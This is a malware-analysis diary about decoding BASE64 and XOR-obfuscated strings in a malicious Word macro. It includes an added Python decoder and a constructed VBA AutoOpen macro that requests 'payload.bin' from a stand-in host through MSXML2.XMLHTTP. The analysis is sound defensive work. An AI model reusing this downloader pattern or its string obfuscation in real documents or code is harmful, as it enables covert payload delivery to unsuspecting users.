Maldoc: Once More It's XOR

Published: 2018-10-13
Last Updated: 2018-10-13 22:20:18 UTC
by Didier Stevens (Version: 1)
3 comment(s)

I was asked for help with malicious Word document MD5 7ea8e50ce884dab89a13803ccebea26e.

Like always, I first run on a sample:

As expected, it contains VBA macros. Then I quickly look at the VBA source code in all macro streams (options -s a -v):

I noticed a string that looks like BASE64 at the end of the VBA source code (that's why I used a tail command in this screenshot). Checking with my tool confirms that this is indeed BASE64:

The output confirms that it is BASE64, although I don't recognize the binary data (most bytes are not printable characters).

The string is BASE64, and function gFpVdtRecxaZD is most likely a BASE64 decoder function. The return value of this function is used as the first argument to function MOMCqdxBOimtoI. Function MOMCqdxBOimtoI takes 2 arguments; the second argument is a printable string.

I've seen this often before: MOMCqdxBOimtoI is most likely a decoding function, and the second string is the decoding key.

Which encoding? First I try XOR, because it's popular. With my tool I check the result of XORing the BASE64-decoded string with the key:

I get a readable, known string: MSXML2.XMLHTTP. This confirms that the encoding is indeed XOR and that the second argument is the key.

Grepping for string MOMCqdxBOimtoI shows me all the lines with encoded strings:

I check the longest string first, because that's most likely the URL:
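The steps above (BASE64-decode the string, XOR it with the repeating key, check whether the result is printable, then find every MOMCqdxBOimtoI call and look at the longest decoded string first) can be scripted. The following is an added example, not code from the diary or from oledump; the VBA macro it scans is constructed for the example (the real sample's strings and key are not reproduced), as are the key Kq7Zx9 and the URL, and the macro text is built with the inverse operation so that the script runs offline.

```python
import base64
import re
import string

# Printable ASCII as an analyst would judge it: letters, digits, punctuation,
# space, tab and newlines (form feed and vertical tab excluded).
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def xor_decode(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key: the scheme the diary identifies."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_string(b64: str, key: str) -> bytes:
    """BASE64-decode, then XOR-decode: MOMCqdxBOimtoI(gFpVdtRecxaZD(b64), key)."""
    return xor_decode(base64.b64decode(b64), key.encode("latin-1"))


def is_printable(data: bytes) -> bool:
    """True when every byte is printable ASCII; this is the check that confirms
    a key guess (a wrong key or wrong algorithm yields mostly unprintable bytes)."""
    return len(data) > 0 and all(chr(b) in PRINTABLE for b in data)


# Programmatic form of "grep MOMCqdxBOimtoI": capture the BASE64 literal passed
# to the decoder and the key literal passed as second argument.
CALL_RE = re.compile(
    r'MOMCqdxBOimtoI\s*\(\s*gFpVdtRecxaZD\s*\(\s*"([A-Za-z0-9+/=]+)"\s*\)'
    r'\s*,\s*"([^"]*)"\s*\)'
)


def extract_calls(vba_source: str):
    """Return (base64, key) pairs for every encoded-string call in the source."""
    return [(m.group(1), m.group(2)) for m in CALL_RE.finditer(vba_source)]


def decode_all(vba_source: str):
    """Decode every call; return (decoded_bytes, printable_flag), longest first,
    because the longest string is usually the URL."""
    decoded = [decode_string(b64, key) for b64, key in extract_calls(vba_source)]
    decoded.sort(key=len, reverse=True)
    return [(d, is_printable(d)) for d in decoded]


# --- constructed sample (not the diary's sample) -----------------------------
def _encode_for_demo(plain: str, key: str) -> str:
    # XOR is symmetric, so the decoder doubles as the encoder for building the demo.
    return base64.b64encode(xor_decode(plain.encode(), key.encode())).decode()


DEMO_KEY = "Kq7Zx9"  # constructed key
DEMO_URL = "http://example.invalid/payload.bin"  # constructed, non-routable URL
DEMO_VBA = f'''
Sub AutoOpen()
    Dim o As Object
    Set o = CreateObject(MOMCqdxBOimtoI(gFpVdtRecxaZD("{_encode_for_demo("MSXML2.XMLHTTP", DEMO_KEY)}"), "{DEMO_KEY}"))
    o.Open MOMCqdxBOimtoI(gFpVdtRecxaZD("{_encode_for_demo("GET", DEMO_KEY)}"), "{DEMO_KEY}"), _
           MOMCqdxBOimtoI(gFpVdtRecxaZD("{_encode_for_demo(DEMO_URL, DEMO_KEY)}"), "{DEMO_KEY}"), False
End Sub
'''

if __name__ == "__main__":
    # Hand-checkable case: "MSXML2.XMLHTTP" XORed with the one-byte key "A" and BASE64-encoded.
    print(decode_string("DBIZDA1zbxkMDQkVFRE=", "A"))
    for data, printable in decode_all(DEMO_VBA):
        print(printable, data)
```

In practice you would feed `decode_all` the output of the macro-stream dump rather than the constructed macro, and try the key guess on one short string first: if `is_printable` fails for every candidate, the scheme is not a plain XOR with that key and it is time to read MOMCqdxBOimtoI's body instead of guessing.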

This analysis can also be automated with plugins.

My oledump plugin plugin_http_heuristics was not able to decode the URL of this sample, until I made a small change:

I'll explain the changes to this plugin in the next diary entry.


Didier Stevens
Senior handler
Microsoft MVP

Keywords: maldoc xor


Do current versions of Word disable support for .DOC by default yet? It would seem to be a good idea. But they also open it in a kind of sandbox, IIRC. So what versions of Word are vulnerable to this and are they in default configuration?
And it would seem that WebSense/Triton hasn't seen it either. It's "uncategorized" as of now as well.
No, .doc is fully supported.